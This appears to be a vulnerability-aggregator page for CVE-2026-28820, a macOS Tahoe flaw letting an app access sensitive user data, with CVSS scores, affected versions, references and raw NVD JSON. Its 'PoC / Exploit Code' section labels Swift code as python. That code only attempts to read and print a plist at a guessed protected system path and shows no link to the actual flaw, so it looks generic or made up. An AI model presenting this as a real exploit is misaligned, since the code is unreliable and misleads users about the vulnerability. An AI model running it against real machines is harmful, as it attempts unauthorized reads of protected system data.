CVE-2026-28820

Description

This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import Foundation

// Conceptual PoC for CVE-2026-28820
// Demonstrates an attempt to access sensitive data without proper entitlements
// This code is for educational purposes only.

func attemptUnauthorizedAccess() {
    let sensitiveFilePath = "/private/var/db/ConfigurationProfiles/Settings/sensitive_data.plist"
    let fileManager = FileManager.default
    
    // In a vulnerable version, insufficient checks might allow this read
    if fileManager.fileExists(atPath: sensitiveFilePath) {
        do {
            let content = try String(contentsOfFile: sensitiveFilePath, encoding: .utf8)
            print("[+] Successfully accessed sensitive data:")
            print(content)
        } catch {
            print("[-] Failed to read file: \(error.localizedDescription)")
        }
    } else {
        print("[-] File not found or path protected.")
    }
}

attemptUnauthorizedAccess()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28820
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28820
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28820/
[4] VulDB https://vuldb.com/cve/CVE-2026-28820
[5] https://support.apple.com/en-us/126794

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28820", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:07.177", "lastModified": "2026-03-26T20:16:11.320", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data."}, {"lang": "es", "value": "Este problema se abordó con comprobaciones mejoradas. Este problema se corrigió en macOS Tahoe 26.4. Una aplicación podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}